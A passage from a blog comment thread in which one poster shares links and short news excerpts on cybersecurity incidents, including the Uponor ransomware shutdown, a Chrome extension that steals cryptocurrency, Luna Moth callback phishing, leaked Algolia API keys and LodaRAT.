    For good reason: (1) Android has an almost 80% market share in Ukraine, and (2) Signal has over 2 million daily active users.

    Reply
  39. Tomi Engdahl says:

    A cyberattack halted the entire production of a Finnish listed company; now comes a profit warning
    https://www.talouselama.fi/uutiset/kyberhyokkays-pysaytti-suomalaisen-porssiyhtion-koko-tuotannon-nyt-tuli-tulosvaroitus/a39293f2-bf17-4ac4-88f2-373da0041010
    At the beginning of November Uponor fell victim to a ransomware attack, which as a precaution drove it into a production shutdown. The company is withdrawing its guidance for 2022, because it is not certain that the lost sales can be recovered within this year.

    Reply
  40. Tomi Engdahl says:

    Google Chrome extension used to steal cryptocurrency, passwords https://www.bleepingcomputer.com/news/security/google-chrome-extension-used-to-steal-cryptocurrency-passwords/
    An information-stealing Google Chrome browser extension named ‘VenomSoftX’ is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web. This Chrome extension is being installed by the ViperSoftX Windows malware, which acts as a JavaScript-based RAT (remote access trojan) and cryptocurrency hijacker.

    Reply
  41. Tomi Engdahl says:

    Ticketmaster blames bot attacks for Taylor Swift ticket fiasco https://therecord.media/ticketmaster-blames-bot-attacks-for-taylor-swift-ticket-fiasco/
    The proliferation of affordable bots-as-a-service tools has made it even more difficult for buyers of tickets and products like sneakers or Playstation 5s. Bots now beat out everyday people thanks to powerful technology made readily available by sites like Cybersole, Kodai, GaneshBot and more. Those using bots then resell the goods for a hefty profit.

    Reply
  42. Tomi Engdahl says:

    Threat Assessment: Luna Moth Callback Phishing Campaign https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/
    Unit 42 investigated several incidents related to the Luna Moth/Silent Ransom Group callback phishing extortion campaign targeting businesses in multiple sectors including legal and retail. This campaign leverages extortion without encryption, has cost victims hundreds of thousands of dollars and is expanding in scope.

    Reply
  43. Tomi Engdahl says:

    Apps with over 3 million installs leak ‘Admin’ search API keys https://www.bleepingcomputer.com/news/security/apps-with-over-3-million-installs-leak-admin-search-api-keys/
    Researchers discovered 1,550 mobile apps leaking Algolia API keys, risking the exposure of sensitive internal services and stored user information. … The Algolia API (Application Program Interface) is a proprietary platform for integrating search engines with discovery and recommendation features in websites and applications used by over 11,000 companies.

    Reply
  44. Tomi Engdahl says:

    The website of Eesti Energia was hit by pro-Kremlin cyber attackers https://www.err.ee/1608794227/eesti-energia-kodulehti-tabas-kremli-meelsete-kuberrunnak
    According to the State Information System Board, the attack by pro-Kremlin criminals simultaneously hit companies and institutions in Latvia, Poland and Ukraine. … “We are closely monitoring what is happening and we are checking that nothing more serious is being attempted in light of the ongoing technologically simple attacks. So far, there have been no other incidents, and only websites and certain services have been disrupted due to the attacks,” [CERT-EE Tõnu Tammer] added.

    Reply
  45. Tomi Engdahl says:

    Get a Loda This: LodaRAT meets new friends https://blog.talosintelligence.com/get-a-loda-this/
    Loda appears to have garnered attention from various threat actors. In a handful of the instances we identified, Loda was deployed alongside, or dropped by, other malware. These include RedLine, Neshta and a previously undocumented VenomRAT variant named S500.

    Reply
